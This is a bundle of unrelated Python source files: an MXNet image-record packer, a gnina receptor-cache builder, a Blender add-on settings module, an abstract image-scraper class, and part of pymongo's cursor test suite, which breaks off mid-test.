#print('write', item.flag, item.id, item.label)
s = mx.recordio.pack(header, b'')
q_out.put((i, s, oitem))
def read_worker(args, q_in, q_out):
while True:
deq = q_in.get()
if deq is None:
break
i, item = deq
image_encode(args, i, item, q_out)
def write_worker(q_out, fname, working_dir):
pre_time = time.time()
count = 0
fname = os.path.basename(fname)
fname_rec = os.path.splitext(fname)[0] + '.rec'
fname_idx = os.path.splitext(fname)[0] + '.idx'
record = mx.recordio.MXIndexedRecordIO(os.path.join(working_dir, fname_idx),
os.path.join(working_dir, fname_rec), 'w')
buf = {}
more = True
while more:
deq = q_out.get()
if deq is not None:
i, s, item = deq
buf[i] = (s, item)
else:
more = False
while count in buf:
s, item = buf[count]
del buf[count]
if s is not None:
#print('write idx', item[0])
record.write_idx(item[0], s)
if count % 1000 == 0:
cur_time = time.time()
print('time:', cur_time - pre_time, ' count:', count)
pre_time = cur_time
count += 1
def parse_args():
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='Create an image list or \
make a record database by reading from an image list')
parser.add_argument('prefix', help='prefix of input/output lst and rec files.')
#parser.add_argument('root', help='path to folder containing images.')
cgroup = parser.add_argument_group('Options for creating image lists')
cgroup.add_argument('--list', type=bool, default=False,
help='If this is set im2rec will create image list(s) by traversing root folder\
and output to <prefix>.lst.\
Otherwise im2rec will read <prefix>.lst and create a database at <prefix>.rec')
cgroup.add_argument('--exts', nargs='+', default=['.jpeg', '.jpg'],
help='list of acceptable image extensions.')
cgroup.add_argument('--chunks', type=int, default=1, help='number of chunks.')
cgroup.add_argument('--train-ratio', type=float, default=1.0,
help='Ratio of images to use for training.')
cgroup.add_argument('--test-ratio', type=float, default=0,
help='Ratio of images to use for testing.')
cgroup.add_argument('--recursive', type=bool, default=False,
help='If true recursively walk through subdirs and assign an unique label\
to images in each folder. Otherwise only include images in the root folder\
and give them label 0.')
cgroup.add_argument('--shuffle', type=bool, default=True, help='If this is set as True, \
im2rec will randomize the image order in <prefix>.lst')
rgroup = parser.add_argument_group('Options for creating database')
rgroup.add_argument('--quality', type=int, default=95,
help='JPEG quality for encoding, 1-100; or PNG compression for encoding, 1-9')
rgroup.add_argument('--num-thread', type=int, default=8,
help='number of thread to use for encoding. order of images will be different\
from the input list if >1. the input list will be modified to match the\
resulting order.')
rgroup.add_argument('--color', type=int, default=1, choices=[-1, 0, 1],
help='specify the color mode of the loaded image.\
1: Loads a color image. Any transparency of image will be neglected. It is the default flag.\
0: Loads image in grayscale mode.\
-1:Loads image as such including alpha channel.')
rgroup.add_argument('--encoding', type=str, default='.jpg', choices=['.jpg', '.png'],
help='specify the encoding of the images.')
rgroup.add_argument('--pack-label', type=bool, default=False,
help='Whether to also pack multi dimensional label in the record file')
args = parser.parse_args()
args.prefix = os.path.abspath(args.prefix)
#args.root = os.path.abspath(args.root)
return args
if __name__ == '__main__':
args = parse_args()
if args.list:
pass
#make_list(args)
else:
if os.path.isdir(args.prefix):
working_dir = args.prefix
else:
working_dir = os.path.dirname(args.prefix)
prop = face_image.load_property(working_dir)
image_size = prop.image_size
print('image_size', image_size)
args.image_h = image_size[0]
args.image_w = image_size[1]
files = [os.path.join(working_dir, fname) for fname in os.listdir(working_dir)
if os.path.isfile(os.path.join(working_dir, fname))]
count = 0
for fname in files:
if fname.startswith(args.prefix) and fname.endswith('.lst'):
print('Creating .rec file from', fname, 'in', working_dir)
count += 1
image_list = read_list(fname)
# -- write_record -- #
if args.num_thread > 1 and multiprocessing is not None:
q_in = [multiprocessing.Queue(1024) for i in range(args.num_thread)]
q_out = multiprocessing.Queue(1024)
read_process = [multiprocessing.Process(target=read_worker, args=(args, q_in[i], q_out)) \
for i in range(args.num_thread)]
for p in read_process:
p.start()
write_process = multiprocessing.Process(target=write_worker, args=(q_out, fname, working_dir))
write_process.start()
for i, item in enumerate(image_list):
q_in[i % len(q_in)].put((i, item))
for q in q_in:
q.put(None)
for p in read_process:
p.join()
q_out.put(None)
write_process.join()
else:
print('multiprocessing not available, fall back to single threaded encoding')
try:
import Queue as queue
except ImportError:
import queue
q_out = queue.Queue()
fname = os.path.basename(fname)
fname_rec = os.path.splitext(fname)[0] + '.rec'
fname_idx = os.path.splitext(fname)[0] + '.idx'
record = mx.recordio.MXIndexedRecordIO(os.path.join(working_dir, fname_idx),
os.path.join(working_dir, fname_rec), 'w')
cnt = 0
pre_time = time.time()
for i, item in enumerate(image_list):
image_encode(args, i, item, q_out)
if q_out.empty():
continue
_, s, item = q_out.get()
#header, _ = mx.recordio.unpack(s)
#print('write header label', header.label)
record.write_idx(item[0], s)
if cnt % 1000 == 0:
cur_time = time.time()
print('time:', cur_time - pre_time, ' count:', cnt)
pre_time = cur_time
cnt += 1
if not count:
            print('Did not find any list file with prefix %s'%args.prefix)
|
create_molcache2.py
|
'''Takes a bunch of types training files. First argument is what index the receptor starts on
Reads in the gninatypes files specified in these types files and writes out a monolithic receptor cache file.
Version 2 is optimized for memory mapped storage of caches. keys (file names) are stored
first followed by dense storage of values (coordinates and types).
Thanks to David Koes for original script (https://github.com/gnina/scripts/blob/master/create_caches2.py)
'''
import os, sys
import struct, argparse, traceback
import multiprocessing
mols_to_read = multiprocessing.Queue()
mols_to_write = multiprocessing.Queue()
N = multiprocessing.cpu_count() * 2
def read_data(data_root):
'''read a types file and put it in mols_to_write'''
while True:
sys.stdout.flush()
mol = mols_to_read.get()
if mol == None:
break
fname = mol
if len(data_root):
fname = data_root + '/' + mol
try:
with open(fname, 'rb') as gninatype:
data = gninatype.read()
assert (len(data) % 16 == 0)
if len(data) == 0:
print(fname, "EMPTY")
else:
mols_to_write.put((mol, data))
except Exception as e:
print(fname)
print(e)
mols_to_write.put(None)
def fill_queue(molfiles):
'thread for filling mols_to_read'
for mol in molfiles:
mols_to_read.put(mol)
for _ in range(N):
mols_to_read.put(None)
def create_cache2(molfiles, data_root, outfile):
'''Create an outfile molcache2 file from the list molfiles stored at data_root.'''
out = open(outfile, 'wb')
    # first int is a version marker
out.write(struct.pack('i', -1))
out.write(struct.pack('L', 0)) # placeholder for offset to keys
filler = multiprocessing.Process(target=fill_queue, args=(molfiles,))
filler.start()
readers = multiprocessing.Pool(N)
for _ in range(N):
readers.apply_async(read_data, (data_root,))
    offsets = dict() # indexed by mol, location of data
# start writing molecular data
endcnt = 0
while True:
moldata = mols_to_write.get()
if moldata == None:
endcnt += 1
if endcnt == N:
break
else:
continue
(mol, data) = moldata
offsets[mol] = out.tell()
natoms = len(data) // 16
out.write(struct.pack('i', natoms))
out.write(data)
start = out.tell() # where the names start
for mol in molfiles:
if len(mol) > 255:
print("Skipping", mol, "since filename is too long")
continue
if mol not in offsets:
print("SKIPPING", mol, "since failed to read it in")
continue
s = bytes(mol, encoding='UTF-8')
out.write(struct.pack('B', len(s)))
out.write(s)
out.write(struct.pack('L', offsets[mol]))
# now set start
out.seek(4)
out.write(struct.pack('L', start))
out.seek(0, os.SEEK_END)
out.close()
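# Illustrative reader sketch (not used by this script): walks the key table that
# create_cache2() appends at the end of the cache and yields each receptor's
# name, atom count and raw 16-byte-per-atom payload. It assumes the cache is
# read on a machine with the same native struct sizes ('i'/'L') used to write it.
def read_cache2(cachefile):
    with open(cachefile, 'rb') as f:
        f.read(struct.calcsize('i'))  # skip the version marker
        keystart, = struct.unpack('L', f.read(struct.calcsize('L')))
        keys = []
        f.seek(keystart)
        while True:
            lenbyte = f.read(1)
            if not lenbyte:
                break
            namelen, = struct.unpack('B', lenbyte)
            name = f.read(namelen).decode('UTF-8')
            offset, = struct.unpack('L', f.read(struct.calcsize('L')))
            keys.append((name, offset))
        for name, offset in keys:
            f.seek(offset)
            natoms, = struct.unpack('i', f.read(struct.calcsize('i')))
            yield name, natoms, f.read(natoms * 16)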
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--col', required=True, type=int, help='Column receptor starts on')
parser.add_argument('--recmolcache', default='rec.molcache2', type=str, help='Filename of receptor cache')
parser.add_argument('-d', '--data_root', type=str, required=False,
help="Root folder for relative paths in train/test files", default='')
parser.add_argument('fnames', nargs='+', type=str, help='types files to process')
args = parser.parse_args()
# load all file names into memory
seenrec = set()
for fname in args.fnames:
for line in open(fname):
vals = line.split()
rec = vals[args.col]
if rec not in seenrec:
seenrec.add(rec)
create_cache2(sorted(list(seenrec)), args.data_root, args.recmolcache)
|
settings.py
|
# MIT License
# Copyright (c) 2017 GiveMeAllYourCats
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the 'Software'), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Code author: Hotox
# Edits by: Hotox
import os
import bpy
import json
import copy
import time
import pathlib
import collections
import tools.supporter
from threading import Thread
from datetime import datetime
from collections import OrderedDict
main_dir = pathlib.Path(os.path.dirname(__file__)).parent.resolve()
resources_dir = os.path.join(str(main_dir), "resources")
settings_file = os.path.join(resources_dir, "settings.json")
settings_data = None
settings_data_unchanged = None
def load_settings():
print('READING SETTINGS FILE')
global settings_data, settings_data_unchanged
# Load settings file and reset it if errors are found
try:
with open(settings_file, encoding="utf8") as file:
settings_data = json.load(file, object_pairs_hook=collections.OrderedDict)
print('SETTINGS LOADED!')
except FileNotFoundError:
print("SETTINGS FILE NOT FOUND!")
reset_settings()
return
except json.decoder.JSONDecodeError:
print("ERROR FOUND IN SETTINGS FILE")
reset_settings()
return
    # Check for missing entries, reset if necessary
if 'last_supporter_update' not in settings_data or 'use_custom_mmd_tools' not in settings_data:
reset_settings()
return
# Check if timestamps are correct
if settings_data.get('last_supporter_update'):
try:
datetime.strptime(settings_data.get('last_supporter_update'), tools.supporter.time_format)
except ValueError:
settings_data['last_supporter_update'] = None
print('RESET TIME')
# Save the settings into the unchanged settings in order to know if the settings changed later
settings_data_unchanged = copy.deepcopy(settings_data)
def save_settings():
with open(settings_file, 'w', encoding="utf8") as outfile:
json.dump(settings_data, outfile, ensure_ascii=False, indent=4)
def reset_settings():
global settings_data, settings_data_unchanged
settings_data = OrderedDict()
settings_data['last_supporter_update'] = None
settings_data['use_custom_mmd_tools'] = False
save_settings()
settings_data_unchanged = copy.deepcopy(settings_data)
print('SETTINGS RESET')
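# After a reset, the settings.json written by save_settings() should look like
# (values are the defaults set in reset_settings()):
# {
#     "last_supporter_update": null,
#     "use_custom_mmd_tools": false
# }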
def start_apply_settings_timer():
thread = Thread(target=apply_settings, args=[])
thread.start()
def apply_settings():
time.sleep(2)
bpy.context.scene.use_custom_mmd_tools = settings_data.get('use_custom_mmd_tools')
def settings_changed():
if settings_data.get('use_custom_mmd_tools') != settings_data_unchanged.get('use_custom_mmd_tools'):
return True
return False
def set_last_supporter_update(last_supporter_update):
settings_data['last_supporter_update'] = last_supporter_update
save_settings()
def get_last_supporter_update():
return settings_data.get('last_supporter_update')
def set_use_custom_mmd_tools(self, context):
settings_data['use_custom_mmd_tools'] = bpy.context.scene.use_custom_mmd_tools
save_settings()
def use_custom_mmd_tools(self, context):
return settings_data.get('use_custom_mmd_tools')
|
beauty_scraper.py
|
# -*- coding: utf-8 -*-
import os
import requests
import shutil
import time
import threading
import beauty_scraper_util as bsUtil
from bs4 import BeautifulSoup
from abc import ABCMeta, abstractmethod
DL_FOLDER_NAME = 'downloads'
class BeautyScraper(object):
    '''Inherit this class and override all the abstract methods'''
__metaclass__ = ABCMeta
@abstractmethod
def get_category_urls(self):
'''Provide category start urls and its name
Example:
return {"http://www.iyi8.com/hot/": "hot",
"http://www.iyi8.com/photo/mm/":"mm",
"http://www.iyi8.com/photo/sexy/": "sexy",
"http://www.iyi8.com/photo/star/": "star",
"http://www.iyi8.com/photo/event/": "event",
}
'''
pass
@abstractmethod
def get_page_url(self, index, first_url):
'''Provide page url with index based on first_url.
e.g.:
index 0 (first_url): "http://www.iyi8.com/star"
index 3: "http://www.iyi8.com/star/3.html"
'''
pass
@abstractmethod
def get_download_folder_path(self):
'''Provide path for download folder name.
beauty_scraper will create a folder located at the provided path for downloaded images.
        The path is relative to the current module path.
e.g.:
return "downloads"
'''
pass
@abstractmethod
def get_downloaded_list_name(self, category):
'''Provide name for downloaded list file.
This file is used to check whether a image has been downloaded.
e.g.:
return "iyi8_" + category + ".txt"
'''
pass
@abstractmethod
def get_image_tags_on_page(self, soup):
        '''Provide the image HTML tags that contain image URLs
e.g.:
return soup.find_all("div", class_="item")
'''
pass
@abstractmethod
def get_image_page_url(self, index, first_url):
'''Provide image page url based on first_url and index
e.g.:
index 0 (first_url): "http://www.iyi8.com/2017/mm_1225/2928.html"
index 3: "http://www.iyi8.com/2017/mm_1225/2928_3.html"
'''
pass
@abstractmethod
def get_image_info(self, soup):
'''Find image url and image name in soup
e.g.:
(sometimes you can locate the parent element of 'img' tag first)
parent = soup.find("div", class_="tupian")
img_url = parent.a.img['src']
file_name = parent.a.img['alt']
'''
pass
def download_images(self, multi_thread=False):
'''Download images of all categories'''
start_urls = self.get_category_urls()
print(start_urls)
if multi_thread:
for url, c in start_urls.items():
work_thread = threading.Thread(target=self._download_images_category, args=(url, c))
work_thread.start()
else:
for url, c in start_urls.items():
self._download_images_category(url, c)
def _download_images_category(self, first_url, category):
'''Download images of specific category'''
DIR_NAME = self.get_download_folder_path()
try:
if not os.path.exists(DIR_NAME):
os.makedirs(DIR_NAME)
except:
pass
# download images from every page
MAX_PAGE = 1000
for page_index in range(MAX_PAGE):
page_url = self.get_page_url(page_index, first_url)
resp = requests.get(page_url)
if resp.status_code != 200:
return
soup = BeautifulSoup(resp.text, "lxml")
self._download_images_on_page(soup, category)
def _download_images_on_page(self, soup, category):
        '''Download images of a specific category from one page'''
tags = self.get_image_tags_on_page(soup)
for tag in tags:
a = tag.a
if a is not None:
image_page_first_url = tag.a['href']
IMAGE_PAGE_COUNT = 100
for i in range(IMAGE_PAGE_COUNT):
image_page_url = self.get_image_page_url(i, image_page_first_url)
r = requests.get(image_page_url)
if r.status_code == 200:
soup = BeautifulSoup(r.text, "lxml")
try:
self._download_image(soup, i, category)
except Exception as e:
print(e)
continue
else:
break
def _download_image(self, soup, index, category):
'''Find real url and name of image in soup and download it'''
img_url, file_name = self.get_image_info(soup)
dir_path = self.get_download_folder_path()
list_name = self.get_downloaded_list_name(category)
if bsUtil.check_downloaded(img_url, list_name=dir_path + "/" + list_name):
return
with open(dir_path + "/" + list_name, "a+") as f:
f.write(img_url + "\n")
path = self.get_download_folder_path()
category_dir = path + "/" + category + "/"
bsUtil.download(img_url, file_name, file_name + "_" + str(index) + ".jpg", category_dir)
        # to avoid getting IP banned; you can use a better strategy
time.sleep(10)
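# Illustrative subclass sketch: wires the iyi8.com URL patterns and selectors
# quoted in the abstract-method docstrings above into a concrete scraper. The
# selectors depend on the live page markup, so treat this as an example rather
# than a tested implementation.
class Iyi8ScraperExample(BeautyScraper):
    def get_category_urls(self):
        return {"http://www.iyi8.com/photo/star/": "star"}
    def get_page_url(self, index, first_url):
        if index == 0:
            return first_url
        return first_url.rstrip('/') + '/%d.html' % index
    def get_download_folder_path(self):
        return DL_FOLDER_NAME
    def get_downloaded_list_name(self, category):
        return "iyi8_" + category + ".txt"
    def get_image_tags_on_page(self, soup):
        return soup.find_all("div", class_="item")
    def get_image_page_url(self, index, first_url):
        if index == 0:
            return first_url
        return first_url.replace('.html', '_%d.html' % index)
    def get_image_info(self, soup):
        parent = soup.find("div", class_="tupian")
        return parent.a.img['src'], parent.a.img['alt']
# Usage sketch: Iyi8ScraperExample().download_images(multi_thread=False)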
|
test_cursor.py
|
# Copyright 2009-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test the cursor module."""
import copy
import gc
import itertools
import random
import re
import sys
import time
import threading
import warnings
sys.path[0:0] = [""]
from bson import decode_all
from bson.code import Code
from bson.py3compat import PY3
from bson.son import SON
from pymongo import (ASCENDING,
DESCENDING,
ALL,
OFF)
from pymongo.collation import Collation
from pymongo.cursor import Cursor, CursorType
from pymongo.errors import (ConfigurationError,
ExecutionTimeout,
InvalidOperation,
OperationFailure)
from pymongo.read_concern import ReadConcern
from pymongo.read_preferences import ReadPreference
from test import (client_context,
unittest,
IntegrationTest)
from test.utils import (EventListener,
ignore_deprecations,
rs_or_single_client,
WhiteListEventListener)
if PY3:
long = int
class TestCursor(IntegrationTest):
def test_deepcopy_cursor_littered_with_regexes(self):
cursor = self.db.test.find({
"x": re.compile("^hmmm.*"),
"y": [re.compile("^hmm.*")],
"z": {"a": [re.compile("^hm.*")]},
re.compile("^key.*"): {"a": [re.compile("^hm.*")]}})
cursor2 = copy.deepcopy(cursor)
self.assertEqual(cursor._Cursor__spec, cursor2._Cursor__spec)
def test_add_remove_option(self):
cursor = self.db.test.find()
self.assertEqual(0, cursor._Cursor__query_flags)
cursor.add_option(2)
cursor2 = self.db.test.find(cursor_type=CursorType.TAILABLE)
self.assertEqual(2, cursor2._Cursor__query_flags)
self.assertEqual(cursor._Cursor__query_flags,
cursor2._Cursor__query_flags)
cursor.add_option(32)
cursor2 = self.db.test.find(cursor_type=CursorType.TAILABLE_AWAIT)
self.assertEqual(34, cursor2._Cursor__query_flags)
self.assertEqual(cursor._Cursor__query_flags,
cursor2._Cursor__query_flags)
cursor.add_option(128)
cursor2 = self.db.test.find(
cursor_type=CursorType.TAILABLE_AWAIT).add_option(128)
self.assertEqual(162, cursor2._Cursor__query_flags)
self.assertEqual(cursor._Cursor__query_flags,
cursor2._Cursor__query_flags)
self.assertEqual(162, cursor._Cursor__query_flags)
cursor.add_option(128)
self.assertEqual(162, cursor._Cursor__query_flags)
cursor.remove_option(128)
cursor2 = self.db.test.find(cursor_type=CursorType.TAILABLE_AWAIT)
self.assertEqual(34, cursor2._Cursor__query_flags)
self.assertEqual(cursor._Cursor__query_flags,
cursor2._Cursor__query_flags)
cursor.remove_option(32)
cursor2 = self.db.test.find(cursor_type=CursorType.TAILABLE)
self.assertEqual(2, cursor2._Cursor__query_flags)
self.assertEqual(cursor._Cursor__query_flags,
cursor2._Cursor__query_flags)
self.assertEqual(2, cursor._Cursor__query_flags)
cursor.remove_option(32)
self.assertEqual(2, cursor._Cursor__query_flags)
# Timeout
cursor = self.db.test.find(no_cursor_timeout=True)
self.assertEqual(16, cursor._Cursor__query_flags)
cursor2 = self.db.test.find().add_option(16)
self.assertEqual(cursor._Cursor__query_flags,
cursor2._Cursor__query_flags)
cursor.remove_option(16)
self.assertEqual(0, cursor._Cursor__query_flags)
# Tailable / Await data
cursor = self.db.test.find(cursor_type=CursorType.TAILABLE_AWAIT)
self.assertEqual(34, cursor._Cursor__query_flags)
cursor2 = self.db.test.find().add_option(34)
self.assertEqual(cursor._Cursor__query_flags,
cursor2._Cursor__query_flags)
cursor.remove_option(32)
self.assertEqual(2, cursor._Cursor__query_flags)
# Partial
cursor = self.db.test.find(allow_partial_results=True)
self.assertEqual(128, cursor._Cursor__query_flags)
cursor2 = self.db.test.find().add_option(128)
self.assertEqual(cursor._Cursor__query_flags,
cursor2._Cursor__query_flags)
cursor.remove_option(128)
self.assertEqual(0, cursor._Cursor__query_flags)
def test_add_remove_option_exhaust(self):
# Exhaust - which mongos doesn't support
if client_context.is_mongos:
with self.assertRaises(InvalidOperation):
self.db.test.find(cursor_type=CursorType.EXHAUST)
else:
cursor = self.db.test.find(cursor_type=CursorType.EXHAUST)
self.assertEqual(64, cursor._Cursor__query_flags)
cursor2 = self.db.test.find().add_option(64)
self.assertEqual(cursor._Cursor__query_flags,
cursor2._Cursor__query_flags)
self.assertTrue(cursor._Cursor__exhaust)
cursor.remove_option(64)
self.assertEqual(0, cursor._Cursor__query_flags)
self.assertFalse(cursor._Cursor__exhaust)
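    # The flag values asserted in the two tests above are OP_QUERY wire-protocol
    # bits: 2 = tailable cursor, 16 = no cursor timeout, 32 = await data,
    # 64 = exhaust, 128 = allow partial results; 34 = tailable + await data and
    # 162 additionally sets partial results.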
def test_allow_disk_use(self):
db = self.db
db.pymongo_test.drop()
coll = db.pymongo_test
self.assertRaises(TypeError, coll.find().allow_disk_use, 'baz')
cursor = coll.find().allow_disk_use(True)
self.assertEqual(True, cursor._Cursor__allow_disk_use)
cursor = coll.find().allow_disk_use(False)
self.assertEqual(False, cursor._Cursor__allow_disk_use)
def test_max_time_ms(self):
db = self.db
db.pymongo_test.drop()
coll = db.pymongo_test
self.assertRaises(TypeError, coll.find().max_time_ms, 'foo')
coll.insert_one({"amalia": 1})
coll.insert_one({"amalia": 2})
coll.find().max_time_ms(None)
coll.find().max_time_ms(long(1))
cursor = coll.find().max_time_ms(999)
self.assertEqual(999, cursor._Cursor__max_time_ms)
cursor = coll.find().max_time_ms(10).max_time_ms(1000)
self.assertEqual(1000, cursor._Cursor__max_time_ms)
cursor = coll.find().max_time_ms(999)
c2 = cursor.clone()
self.assertEqual(999, c2._Cursor__max_time_ms)
self.assertTrue("$maxTimeMS" in cursor._Cursor__query_spec())
self.assertTrue("$maxTimeMS" in c2._Cursor__query_spec())
self.assertTrue(coll.find_one(max_time_ms=1000))
client = self.client
if (not client_context.is_mongos
and client_context.test_commands_enabled):
# Cursor parses server timeout error in response to initial query.
client.admin.command("configureFailPoint",
"maxTimeAlwaysTimeOut",
mode="alwaysOn")
try:
cursor = coll.find().max_time_ms(1)
try:
next(cursor)
except ExecutionTimeout:
pass
else:
self.fail("ExecutionTimeout not raised")
self.assertRaises(ExecutionTimeout,
coll.find_one, max_time_ms=1)
finally:
client.admin.command("configureFailPoint",
"maxTimeAlwaysTimeOut",
mode="off")
@client_context.require_version_min(3, 1, 9, -1)
def test_max_await_time_ms(self):
db = self.db
db.pymongo_test.drop()
coll = db.create_collection("pymongo_test", capped=True, size=4096)
self.assertRaises(TypeError, coll.find().max_await_time_ms, 'foo')
coll.insert_one({"amalia": 1})
coll.insert_one({"amalia": 2})
coll.find().max_await_time_ms(None)
coll.find().max_await_time_ms(long(1))
# When cursor is not tailable_await
cursor = coll.find()
self.assertEqual(None, cursor._Cursor__max_await_time_ms)
cursor = coll.find().max_await_time_ms(99)
self.assertEqual(None, cursor._Cursor__max_await_time_ms)
# If cursor is tailable_await and timeout is unset
cursor = coll.find(cursor_type=CursorType.TAILABLE_AWAIT)
self.assertEqual(None, cursor._Cursor__max_await_time_ms)
# If cursor is tailable_await and timeout is set
cursor = coll.find(
cursor_type=CursorType.TAILABLE_AWAIT).max_await_time_ms(99)
self.assertEqual(99, cursor._Cursor__max_await_time_ms)
cursor = coll.find(
cursor_type=CursorType.TAILABLE_AWAIT).max_await_time_ms(
10).max_await_time_ms(90)
self.assertEqual(90, cursor._Cursor__max_await_time_ms)
listener = WhiteListEventListener('find', 'getMore')
coll = rs_or_single_client(
event_listeners=[listener])[self.db.name].pymongo_test
results = listener.results
# Tailable_await defaults.
list(coll.find(cursor_type=CursorType.TAILABLE_AWAIT))
# find
self.assertFalse('maxTimeMS' in results['started'][0].command)
# getMore
self.assertFalse('maxTimeMS' in results['started'][1].command)
results.clear()
# Tailable_await with max_await_time_ms set.
list(coll.find(
cursor_type=CursorType.TAILABLE_AWAIT).max_await_time_ms(99))
# find
self.assertEqual('find', results['started'][0].command_name)
self.assertFalse('maxTimeMS' in results['started'][0].command)
# getMore
self.assertEqual('getMore', results['started'][1].command_name)
self.assertTrue('maxTimeMS' in results['started'][1].command)
self.assertEqual(99, results['started'][1].command['maxTimeMS'])
results.clear()
# Tailable_await with max_time_ms
list(coll.find(
cursor_type=CursorType.TAILABLE_AWAIT).max_time_ms(99))
# find
self.assertEqual('find', results['started'][0].command_name)
self.assertTrue('maxTimeMS' in results['started'][0].command)
self.assertEqual(99, results['started'][0].command['maxTimeMS'])
# getMore
self.assertEqual('getMore', results['started'][1].command_name)
self.assertFalse('maxTimeMS' in results['started'][1].command)
results.clear()
# Tailable_await with both max_time_ms and max_await_time_ms
list(coll.find(
cursor_type=CursorType.TAILABLE_AWAIT).max_time_ms(
99).max_await_time_ms(99))
# find
self.assertEqual('find', results['started'][0].command_name)
self.assertTrue('maxTimeMS' in results['started'][0].command)
self.assertEqual(99, results['started'][0].command['maxTimeMS'])
# getMore
self.assertEqual('getMore', results['started'][1].command_name)
self.assertTrue('maxTimeMS' in results['started'][1].command)
self.assertEqual(99, results['started'][1].command['maxTimeMS'])
results.clear()
# Non tailable_await with max_await_time_ms
list(coll.find(batch_size=1).max_await_time_ms(99))
# find
self.assertEqual('find', results['started'][0].command_name)
self.assertFalse('maxTimeMS' in results['started'][0].command)
# getMore
self.assertEqual('getMore', results['started'][1].command_name)
self.assertFalse('maxTimeMS' in results['started'][1].command)
results.clear()
# Non tailable_await with max_time_ms
list(coll.find(batch_size=1).max_time_ms(99))
# find
self.assertEqual('find', results['started'][0].command_name)
self.assertTrue('maxTimeMS' in results['started'][0].command)
self.assertEqual(99, results['started'][0].command['maxTimeMS'])
# getMore
self.assertEqual('getMore', results['started'][1].command_name)
self.assertFalse('maxTimeMS' in results['started'][1].command)
# Non tailable_await with both max_time_ms and max_await_time_ms
list(coll.find(batch_size=1).max_time_ms(99).max_await_time_ms(88))
# find
self.assertEqual('find', results['started'][0].command_name)
self.assertTrue('maxTimeMS' in results['started'][0].command)
self.assertEqual(99, results['started'][0].command['maxTimeMS'])
# getMore
self.assertEqual('getMore', results['started'][1].command_name)
self.assertFalse('maxTimeMS' in results['started'][1].command)
@client_context.require_test_commands
@client_context.require_no_mongos
def test_max_time_ms_getmore(self):
# Test that Cursor handles server timeout error in response to getmore.
coll = self.db.pymongo_test
coll.insert_many([{} for _ in range(200)])
cursor = coll.find().max_time_ms(100)
# Send initial query before turning on failpoint.
next(cursor)
self.client.admin.command("configureFailPoint",
"maxTimeAlwaysTimeOut",
mode="alwaysOn")
try:
try:
# Iterate up to first getmore.
list(cursor)
except ExecutionTimeout:
pass
else:
self.fail("ExecutionTimeout not raised")
finally:
self.client.admin.command("configureFailPoint",
"maxTimeAlwaysTimeOut",
mode="off")
def test_explain(self):
a = self.db.test.find()
a.explain()
for _ in a:
break
b = a.explain()
# "cursor" pre MongoDB 2.7.6, "executionStats" post
self.assertTrue("cursor" in b or "executionStats" in b)
def test_explain_with_read_concern(self):
# Do not add readConcern level to explain.
listener = WhiteListEventListener("explain")
client = rs_or_single_client(event_listeners=[listener])
self.addCleanup(client.close)
coll = client.pymongo_test.test.with_options(
read_concern=ReadConcern(level="local"))
self.assertTrue(coll.find().explain())
started = listener.results['started']
self.assertEqual(len(started), 1)
self.assertNotIn("readConcern", started[0].command)
def test_hint(self):
db = self.db
self.assertRaises(TypeError, db.test.find().hint, 5.5)
db.test.drop()
db.test.insert_many([{"num": i, "foo": i} for i in range(100)])
self.assertRaises(OperationFailure,
db.test.find({"num": 17, "foo": 17})
.hint([("num", ASCENDING)]).explain)
self.assertRaises(OperationFailure,
db.test.find({"num": 17, "foo": 17})
.hint([("foo", ASCENDING)]).explain)
spec = [("num", DESCENDING)]
index = db.test.create_index(spec)
first = next(db.test.find())
self.assertEqual(0, first.get('num'))
first = next(db.test.find().hint(spec))
self.assertEqual(99, first.get('num'))
self.assertRaises(OperationFailure,
db.test.find({"num": 17, "foo": 17})
.hint([("foo", ASCENDING)]).explain)
a = db.test.find({"num": 17})
a.hint(spec)
for _ in a:
break
self.assertRaises(InvalidOperation, a.hint, spec)
def test_hint_by_name(self):
db = self.db
db.test.drop()
db.test.insert_many([{"i": i} for i in range(100)])
db.test.create_index([('i', DESCENDING)], name='fooindex')
first = next(db.test.find())
self.assertEqual(0, first.get('i'))
first = next(db.test.find().hint('fooindex'))
self.assertEqual(99, first.get('i'))
def test_limit(self):
db = self.db
self.assertRaises(TypeError, db.test.find().limit, None)
self.assertRaises(TypeError, db.test.find().limit, "hello")
self.assertRaises(TypeError, db.test.find().limit, 5.5)
self.assertTrue(db.test.find().limit(long(5)))
db.test.drop()
db.test.insert_many([{"x": i} for i in range(100)])
count = 0
for _ in db.test.find():
count += 1
self.assertEqual(count, 100)
count = 0
for _ in db.test.find().limit(20):
count += 1
self.assertEqual(count, 20)
count = 0
for _ in db.test.find().limit(99):
count += 1
self.assertEqual(count, 99)
count = 0
for _ in db.test.find().limit(1):
count += 1
self.assertEqual(count, 1)
count = 0
for _ in db.test.find().limit(0):
count += 1
self.assertEqual(count, 100)
count = 0
for _ in db.test.find().limit(0).limit(50).limit(10):
count += 1
self.assertEqual(count, 10)
a = db.test.find()
a.limit(10)
for _ in a:
break
self.assertRaises(InvalidOperation, a.limit, 5)
@ignore_deprecations # Ignore max without hint.
def test_max(self):
db = self.db
db.test.drop()
j_index = [("j", ASCENDING)]
db.test.create_index(j_index)
db.test.insert_many([{"j": j, "k": j} for j in range(10)])
